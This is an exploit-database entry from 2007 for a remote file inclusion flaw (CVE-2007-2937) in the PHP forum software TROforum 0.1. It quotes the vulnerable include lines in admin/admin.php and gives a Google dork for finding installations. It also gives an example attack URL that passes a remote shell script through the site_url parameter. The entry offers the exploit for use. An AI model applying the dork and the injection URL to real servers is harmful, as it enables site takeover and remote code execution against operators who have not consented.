Exploit TROforum 0.1 - 'admin.php?site_url' Remote File Inclusion

[Exploiter]

EDB-ID

3995

Проверка EDB

1. Пройдено

Автор

MEHMET INCE

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2007-2937

Дата публикации

2007-05-26

##############################################################################################
# TROforum 0.1  <=  Remote File Inclusion Vulnerability                                      #
#                                                                                            #

#Dork:http://www.google.com.tr/search?hl=tr&q=%22TROforum+0.1%22&meta=                       #
#                                                                                            #

#                                                                                            #
##############################################################################################
#Vuln Code                                                                                   #  

#                                                                                            # 
#ERROR1:admin/admin.php                                                                      # 
#                                                                                            # 

include ("$site_url/trofimov.php");    include ("$site_url/narod.php");  <<<RFI              #
#                                                                                            # 

#                                                                                            # 
#                                                                                            # 
#BUG1:                                                                                       # 

#                                                                                            # 
#Example1:http://victim.com/path/admin/admin.php?site_url=[[Sh3LL Script]]                   #
##############################################################################################


##############################################################################################

#                                                                                            # 
#Script Download                                                                             # 
##############################################################################################

#                                                                                            # 
#http://scripts.protoplex.ru/scripts_show/1277.html                                          # 
#                                                                                            # 

##############################################################################################
#                                                                                            # 
#Cyber-Security <>                                                                           # 

#                                                                                            # 
##############################################################################################
##############################################################################################

# milw0rm.com [2007-05-26]